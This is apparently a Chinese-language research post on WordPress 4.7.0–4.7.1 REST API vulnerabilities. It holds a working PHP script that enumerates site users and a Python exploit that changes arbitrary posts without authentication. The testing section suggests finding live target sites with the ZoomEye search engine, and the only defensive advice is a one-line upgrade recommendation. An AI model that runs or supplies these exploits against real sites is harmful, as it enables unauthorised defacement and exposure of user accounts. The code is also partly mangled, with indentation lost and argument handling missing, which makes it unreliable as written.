wordpress4.7.0-4.7.1內容注入漏洞研究
一、獲取user
1.影響:未授權獲取發佈過文章的其他用戶的用戶名、id
2.觸發前提: wordpress配置REST API
3.影響版本:<= 4.7
4.漏洞說明: Get請求什麼都不用做就可以避開wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php 的邏輯判斷,返回ture,程序繼續執行query,REST API接口查詢後以json格式在前端顯示。能夠獲取到用戶的一些信息。 請求地址:http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
5.exploit:
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: [email protected]
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "http://xxxx.cn/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>
6.效果:
二、未授權而更改任意文章
1.影響:未授權獲取發佈過文章的其他用戶的用戶名、id
2.觸發前提: wordpress配置REST API
**3.影響版本:**wp4.7.0-4.7.1
4.漏洞說明: 由於服務器配置的REST API存在漏洞,導致WordPress所有文章內容可以未經驗證被查看,修改,刪除,甚至創建新的文章
5.exploit:
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)
data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not enabled. This might not work!')
return u
def get_posts(api_base):
respone = urllib2.urlopen(api_base + 'wp/v2/posts')
posts = json.loads(respone.read())
for post in posts:
print(' - Post ID: {0}, Title: {1}, Url: {2}'
.format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
# more than just the content field can be updated. see the api docs here:
# https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
data = json.dumps({
'content': post_content
})
url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
# ensure we have at least a url
# if we have a post id, we need content too
print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {0}'.format(api_url))
# if we only have a url, show the posts we have have
# if we get here, we have what we need to update a post!
print('* Updating post {0}'.format(sys.argv[2]))
#with open(sys.argv[3], 'r') as content:
# new_content = content.readlines()
new_content='fff'
update_post(api_url, sys.argv[2], new_content)
print('* Update complete!')
6.漏洞測試:
6.1 先用zoomeye搜一個靶機
6.2 說明:腳本test.py同目錄下創建一個content文件,裏面放需要修改的內容
執行腳本:python test.py url 1 content(url爲攻擊目標這裏就不給出了)
ps:這個腳本最好在linux下執行,windows下需要改一下。
7 最後效果圖
8 修復建議:升級到最新版wp
9 最後總結:由api漏洞引起的未授權操作應該引起注意,在以後的漏洞研究中應多關注此類漏洞。關於代碼方面,大概看了一下,主要還是由於程序員代碼邏輯問題導致了未授權操作的發生。